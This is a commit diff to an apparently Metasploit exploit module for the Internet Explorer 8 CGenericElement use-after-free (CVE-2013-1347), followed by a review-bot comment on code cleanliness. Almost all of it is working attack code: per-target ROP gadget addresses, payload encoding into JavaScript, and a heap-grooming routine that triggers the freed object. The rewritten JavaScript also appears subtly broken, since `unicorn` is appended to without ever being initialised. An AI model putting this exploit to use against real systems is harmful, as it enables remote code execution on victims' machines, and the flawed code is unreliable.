
Commit c7609ac

committed
Initial update
1 parent fff8593 commit c7609ac


1 file changed

+48
-69
lines changed

1 file changed

+48
-69
lines changed

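--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -48,6 +48,7 @@ def initialize(info={})
 [
 [ 'CVE', '2013-1347' ],
 [ 'OSVDB', '92993' ],
+[ 'US-CERT-VU', '237655' ],
 [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
 [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
 ],
@@ -114,67 +115,12 @@ def get_target(agent)
 return nil
 end
 
-def ie8_smil(my_target, p)
-
-case my_target['Rop']
-when :msvcrt
-case my_target.name
-when 'IE 8 on Windows XP SP3'
-align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
-xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
-when 'IE 8 on Windows Server 2003'
-align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
-xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
-end
-else
-align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
-xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
-end
-
-padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
-js_payload = Rex::Text.to_unescape(p)
-
-js = %Q|
-unicorn = unescape("ABCD");
-unicorn2 = unescape("EEEE");
-for (i=0; i < 2; i++) {
-unicorn += unescape("ABCD");
-}unicorn += unescape("AB");
-
-unicorn += unescape("#{js_payload}");
-
-animvalues = unescape("#{align_esp}");
-
-for (i=0; i < 0x70/4; i++) {
-if (i == 0x70/4-1) {
-animvalues += unescape("#{xchg_esp}");
-}
-else {
-animvalues += unescape("#{align_esp}");
-}
-}
-
-animvalues += unicorn;
-
-for(i = 0; i < 13; i++) {
-animvalues += ";red";
-}
-|
-
-if datastore['OBFUSCATE']
-js = ::Rex::Exploitation::JSObfu.new(js)
-js.obfuscate
-end
-
-return js
-end
-
 def junk(n=4)
-return rand_text_alpha(n).unpack("V")[0].to_i
+rand_text_alpha(n).unpack("V")[0].to_i
 end
 
 def nop
-return make_nops(4).unpack("V")[0].to_i
+make_nops(4).unpack("V")[0].to_i
 end
 
 def get_payload(t, cli)
@@ -280,9 +226,24 @@ def get_payload(t, cli)
 end
 
 def load_exploit_html(my_target, cli)
+case my_target['Rop']
+when :msvcrt
+case my_target.name
+when 'IE 8 on Windows XP SP3'
+align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
+xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
+when 'IE 8 on Windows Server 2003'
+align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
+xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
+end
+else
+align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
+xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
+end
+
+padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
+js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
 
-p = get_payload(my_target, cli)
-js = ie8_smil(my_target, p)
 
 html = %Q|
 <!doctype html>
@@ -293,9 +254,10 @@ def load_exploit_html(my_target, cli)
 </meta>
 
 <script>
+#{js_mstime_malloc}
+
 function helloWorld()
 {
-#{js}
 f0 = document.createElement('span');
 document.body.appendChild(f0);
 f1 = document.createElement('span');
@@ -306,21 +268,38 @@ def load_exploit_html(my_target, cli)
 f2.appendChild(document.createElement('datalist'));
 f1.appendChild(document.createElement('span'));
 f1.appendChild(document.createElement('table'));
-try{
-f0.offsetParent=null;
-}catch(e) {
 
-}f2.innerHTML="";
+try { f0.offsetParent=null;}
+catch(e) { }
+
+f2.innerHTML = "";
 f0.appendChild(document.createElement('hr'));
-f1.innerHTML="";
+f1.innerHTML = "";
 
 CollectGarbage();
 
-try {
-a = document.getElementById('myanim');
-a.values = animvalues;
+hd = unescape("ABCD");
+for (i=0; i < 2; i++) {
+unicorn += unescape("ABCD");
 }
-catch(e) {}
+unicorn += unescape("AB");
+
+unicorn += unescape("#{js_payload}");
+
+animvalues = unescape("#{align_esp}");
+
+for (i=0; i < 0x70/4; i++) {
+if (i == 0x70/4-1) {
+animvalues += unescape("#{xchg_esp}");
+}
+else {
+animvalues += unescape("#{align_esp}");
+}
+}
+
+animvalues += unicorn;
+
+mstime_malloc({shellcode:animvalues, heapBlockSize:0x38, objId:"myanim"});
 }
 
 </script>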
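Review bot: `padding` is assigned at the top of load_exploit_html (new line 244) but is never referenced in any of the visible hunks, just as it was unused in the removed ie8_smil; it is dead code carried over verbatim and the line `padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))` should be dropped. The removal of ie8_smil also drops the `if datastore['OBFUSCATE']` branch, so if that option is still registered in initialize (outside these hunks) it is now silently ignored and its registration should go as well, or the change log should say the option was retired. Finally, the new inline JavaScript has no comment explaining what the ROP-address `case` selects on, where the old helper at least had its own method name as a hint; a one-line comment such as `# pick align/xchg gadget addresses per target ('Rop' and name)` above the `case` would help the next maintainer. The body of load_exploit_html continues past the end of the last hunk.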
